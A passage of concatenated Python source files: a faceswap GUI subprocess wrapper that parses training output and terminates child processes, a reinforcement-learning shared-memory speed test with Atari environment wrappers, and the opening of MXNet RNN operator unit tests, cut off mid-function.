self.statusbar.progress_update(message, 0, False)
return True
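# Illustrative example of what the "loss" regex is expected to extract (the sample
# line below is made up, not captured from a real faceswap run):
#   "[12:34:56] loss_A: 0.02345, loss_B: 0.02512"
# findall() would yield [('loss_A', '0.02345'), ('loss_B', '0.02512')], which is
# forwarded to the session stats and rendered in the status bar message.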
def capture_tqdm(self, string):
""" Capture tqdm output for progress bar """
tqdm = self.consoleregex["tqdm"].findall(string)
if len(tqdm) != 5:
return False
percent = tqdm[0]
processed = tqdm[1]
processtime = "Elapsed: {} Remaining: {}".format(tqdm[2], tqdm[3])
rate = tqdm[4]
message = "{} | {} | {} | {}".format(processtime,
rate,
processed,
percent)
current, total = processed.split("/")
position = int((float(current) / float(total)) * 1000)
self.statusbar.progress_update(message, position, True)
return True
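# Illustrative example of what the "tqdm" regex is expected to match (the sample
# line below is made up, not captured from a real run):
#   " 45%|####5    | 450/1000 [00:12<00:15,  36.2it/s]"
# findall() would yield exactly 5 tokens: percent, processed ("450/1000"),
# elapsed, remaining, and rate, which are reassembled into the progress message.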
def terminate(self):
""" Terminate the subprocess """
if self.command == "train":
print("Sending Exit Signal", flush=True)
try:
now = time()
if os.name == "nt":
os.kill(self.process.pid, signal.CTRL_BREAK_EVENT)
else:
self.process.send_signal(signal.SIGINT)
while True:
timeelapsed = time() - now
if self.process.poll() is not None:
break
if timeelapsed > 30:
raise ValueError("Timeout reached sending Exit Signal")
return
except ValueError as err:
print(err)
elif self.command in self.__group_processes:
print("Terminating Process Group...")
pgid = os.getpgid(self.process.pid)
try:
os.killpg(pgid, signal.SIGINT)
self.process.wait(timeout=10)
print("Terminated")
except TimeoutExpired:
print("Termination timed out. Killing Process Group...")
os.killpg(pgid, signal.SIGKILL)
print("Killed")
else:
print("Terminating Process...")
try:
self.process.terminate()
self.process.wait(timeout=10)
print("Terminated")
except TimeoutExpired:
print("Termination timed out. Killing Process...")
self.process.kill()
print("Killed")
def set_final_status(self, returncode):
""" Set the status bar output based on subprocess return code """
if returncode == 0 or returncode == 3221225786:
status = "Ready"
elif returncode == -15:
status = "Terminated - {}.py".format(self.command)
elif returncode == -9:
status = "Killed - {}.py".format(self.command)
elif returncode == -6:
status = "Aborted - {}.py".format(self.command)
else:
status = "Failed - {}.py. Return Code: {}".format(self.command,
returncode)
return status
|
shared_memory_speed_test.py
|
# https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=((shp[0] * k,)+shp[1:]), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=0)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
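def _lazyframes_demo():
    # Minimal sketch (not part of the original script) showing the intent of
    # LazyFrames: the stacked observation is only materialised when converted
    # to a numpy array, so shared frames are not duplicated in the buffer.
    frames = [np.zeros((1, 84, 84), dtype=np.uint8) for _ in range(4)]
    lazy = LazyFrames(frames)
    stacked = np.array(lazy)           # forces concatenation along axis 0
    assert stacked.shape == (4, 84, 84)
    return stacked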
def wrap_atari(env, max_episode_steps=None):
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x weight x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
env = ImageToPyTorch(env)
if frame_stack:
env = FrameStack(env, 4)
return env
# Reference: https://www.cs.toronto.edu/~vmnih/docs/dqn.pdf
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import collections
import numpy as np
import gym
from gym.wrappers import TimeLimit, Monitor
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
# import threading
# os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
from torch import multiprocessing as mp
from multiprocessing.managers import SyncManager, SharedMemoryManager
from multiprocessing.shared_memory import SharedMemory
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
from faster_fifo import Queue as MpQueue
from torch.multiprocessing import Process as TorchProcess
torch.multiprocessing.set_sharing_strategy('file_system')
class SharedNDArray(np.ndarray):
def set_shm(self, shm):
self.shm = shm
def close(self):
self.shm.close()
def unlink(self):
self.shm.unlink()
def share_memory(arr):
shm = SharedMemory(create=True, size=arr.nbytes)
shm_arr = SharedNDArray(arr.shape, dtype=arr.dtype, buffer=shm.buf)
shm_arr[:] = arr[:]
shm_arr.set_shm(shm)
return shm_arr
def share_memory(arr):
t = torch.tensor(arr)
t.share_memory_()
return t
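def _shared_memory_demo():
    # Illustrative sketch (not in the original script). Note that the second
    # share_memory definition above overrides the first, so the script actually
    # shares torch tensors; the raw SharedMemory approach can still be
    # exercised directly, as below.
    src = np.arange(12, dtype=np.float32).reshape(3, 4)
    shm = SharedMemory(create=True, size=src.nbytes)
    view = np.ndarray(src.shape, dtype=src.dtype, buffer=shm.buf)
    view[:] = src                      # copy the data into the shared buffer
    assert view.sum() == src.sum()     # both arrays see the same values
    del view                           # drop the buffer reference before closing
    shm.close()
    shm.unlink()                       # release the shared segment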
class Actor:
def __init__(self, inputs):
self.inputs = inputs
self.process = TorchProcess(target=self.act, daemon=True)
self.process.start()
def act(self):
# print(torch.ones((12,23,42)).sum())
torch.multiprocessing.set_sharing_strategy('file_system')
args, experiment_name, i, lock, stats_queue, device, \
obs, obs_sm, logprobs, rewards, dones, values = self.inputs
obs = to_numpy(obs_sm, 5)
envs = []
# o = np.ones((210, 160, 3))
# print(o.sum())
# print(torch.ones((84,160,3)).sum())
# raise
def make_env(gym_id, seed, idx):
env = gym.make(gym_id)
env = wrap_atari(env)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = wrap_deepmind(
env,
clip_rewards=True,
frame_stack=True,
scale=False,
)
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
envs = [make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]
envs = np.array(envs, dtype=object)
for env_idx, env in enumerate(envs):
env.reset()
# print('Process %d finished resetting %d/%d envs', env_idx + 1, len(envs))
last_report = last_report_frames = total_env_frames = 0
while True:
for env_idx, env in enumerate(envs):
# os = []
for step in range(args.num_steps):
action = env.action_space.sample()
o, r, d, info = env.step(action)
if d:
o = env.reset()
# os += [o]
# print(obs[i,env_idx,0,0,step].shape, torch.from_numpy(o).shape)
# raise
# o = np.ones((210, 160, 3))
# obs[i,env_idx,0,0,step] = o
# print("before", id(obs[i,env_idx,0,0,step]), i, env_idx, step)
# t =
obs[i,env_idx,0,0,step].copy_(torch.from_numpy(np.array(o)))
# print(torch.from_numpy(np.array(o)).sum(), obs[i,env_idx,0,0,step].sum(), i, env_idx, step)
# print(obs[i,env_idx,0,0,step].sum(), i, env_idx, step)
# print(id(obs[i,env_idx,0,0,step]), i, env_idx, step)
# print(id(obs_sm))
# # print(obs_sm.sum())
# raise
# rewards[i,env_idx,0,0,step] = r
# dones[i,env_idx,0,0,step] = d
num_frames = 1
total_env_frames += num_frames
if 'episode' in info.keys():
stats_queue.put(info['episode']['l'])
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='DQN agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="BreakoutNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=1e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=2,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=100000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='whether to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--num-rollout-workers', type=int, default=mp.cpu_count(),
help='the number of rollout workers')
parser.add_argument('--num-policy-workers', type=int, default=1,
help='the number of policy workers')
parser.add_argument('--num-envs', type=int, default=20,
help='the number of envs per rollout worker')
parser.add_argument('--num-traj-buffers', type=int, default=1,
help='the number of trajectory buffers per rollout worker')
parser.add_argument('--num-steps', type=int, default=32,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Toggles whether or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
wandb.init(project=args.wandb_project_name, entity=args.wandb_entity, sync_tensorboard=True, config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
writer = SummaryWriter(f"/tmp/{experiment_name}")
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
def make_env(gym_id, seed, idx):
env = gym.make(gym_id)
env = wrap_atari(env)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = wrap_deepmind(
env,
clip_rewards=True,
frame_stack=True,
scale=False,
)
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
env = make_env(args.gym_id, args.seed, 0)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
assert isinstance(env.action_space, Discrete), "only discrete action space is supported"
# m = SyncManager()
# m.start()
lock = mp.Lock()
dimensions = (
args.num_rollout_workers,
args.num_envs,
args.num_policy_workers,
args.num_traj_buffers,
args.num_steps,
)
# smm = SharedMemoryManager()
# smm.start()
# rewards = share_memory(np.zeros(dimensions + (args.num_envs,)), smm)
# def share_memory(a, smm):
# """simply put array `a` into shared memory
# https://docs.python.org/3/library/multiprocessing.shared_memory.html"""
# shm = smm.SharedMemory(size=a.nbytes)
# # Now create a NumPy array backed by shared memory
# b = np.ndarray(a.shape, dtype=a.dtype, buffer=shm.buf)
# b[:] = a[:] # Copy the original data into shared memory
# del a
# return b
# with SharedMemoryManager() as smm:
# raise
def to_numpy(t, num_dimensions):
arr_shape = t.shape[:num_dimensions]
arr = np.ndarray(arr_shape, dtype=object)
to_numpy_func(t, arr)
return arr
def to_numpy_func(t, arr):
if len(arr.shape) == 1:
for i in range(t.shape[0]):
arr[i] = t[i]
else:
for i in range(t.shape[0]):
to_numpy_func(t[i], arr[i])
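# to_numpy/to_numpy_func expand the first `num_dimensions` axes of a shared
# tensor into an object ndarray whose entries are views into that tensor, so a
# rollout worker can index obs[worker, env, ...] and write into the shared
# storage without copying it.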
obs_sm = share_memory(np.zeros(dimensions + env.observation_space.shape))
obs = to_numpy(obs_sm, 5)
actions = share_memory(np.zeros(dimensions + env.action_space.shape))
logprobs = share_memory(np.zeros(dimensions))
rewards = share_memory(np.zeros(dimensions))
dones = share_memory(np.zeros(dimensions))
values = share_memory(np.zeros(dimensions))
# traj_availables = share_memory(np.zeros(dimensions))
# raise
# raise
# global_step = torch.tensor(0)
# global_step.share_memory_()
actor_processes = []
data_processor_processes = []
# ctx = mp.get_context("forkserver")
stats_queue = MpQueue()
# stats_queue = mp.Queue(1000)
rollouts_queue = mp.Queue(1000)
data_process_queue = mp.Queue(1000)
data_process_back_queues = []
for i in range(args.num_rollout_workers):
inputs = [args, experiment_name, i, lock, stats_queue, device,
obs, obs_sm, logprobs, rewards, dones, values]
a = Actor(inputs)
# actor = mp.Process(
# target=a.act,
# daemon=True
# # args=[inputs],
# )
# actor.start()
# actor_processes.append(actor)
# learner = ctx.Process(
# target=learn,
# args=(
# args, rb, global_step,
# data_process_queue,
# data_process_back_queues, stats_queue, lock, learn_target_network, target_network, learn_q_network, q_network, optimizer, device
# ),
# )
# learner.start()
import timeit
timer = timeit.default_timer
existing_video_files = []
global_step = 0
global_step_increment = 0
start_time = time.time()
update_step = 0
try:
while global_step < args.total_timesteps:
update_step += 1
# start_global_step = global_step
try:
ls = stats_queue.get_many(timeout=1)
for l in ls:
global_step_increment += l
except:
continue
# writer.add_scalar("charts/episode_reward", r, global_step)
# writer.add_scalar("charts/stats_queue_size", stats_queue.qsize(), global_step)
# writer.add_scalar("charts/rollouts_queue_size", rollouts_queue.qsize(), global_step)
# writer.add_scalar("charts/data_process_queue_size", data_process_queue.qsize(), global_step)
if update_step % 10 == 0:
# print(f"global_step={global_step}, episode_reward={r}")
print(f"global_step={global_step}")
global_step += global_step_increment
writer.add_scalar("charts/fps", global_step_increment / (time.time() - start_time), global_step)
print("FPS: ", global_step_increment / (time.time() - start_time))
global_step_increment = 0
start_time = time.time()
# else:
# # print(m[0], m[1], global_step)
# # writer.add_scalar(m[0], m[1], global_step)
# pass
# if args.capture_video and args.prod_mode:
# video_files = glob.glob(f'videos/{experiment_name}/*.mp4')
# for video_file in video_files:
# if video_file not in existing_video_files:
# existing_video_files += [video_file]
# print(video_file)
# if len(existing_video_files) > 1:
# wandb.log({"video.0": wandb.Video(existing_video_files[-2])})
except KeyboardInterrupt:
pass
finally:
# learner.terminate()
# learner.join(timeout=1)
for actor in actor_processes:
actor.terminate()
actor.join(timeout=1)
for data_processor in data_processor_processes:
data_processor.terminate()
data_processor.join(timeout=1)
if args.capture_video and args.prod_mode:
wandb.log({"video.0": wandb.Video(existing_video_files[-1])})
# env.close()
writer.close()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if grad_req != 'null':
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
else:
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
T, N, I, H = 5, 20, 200, 200
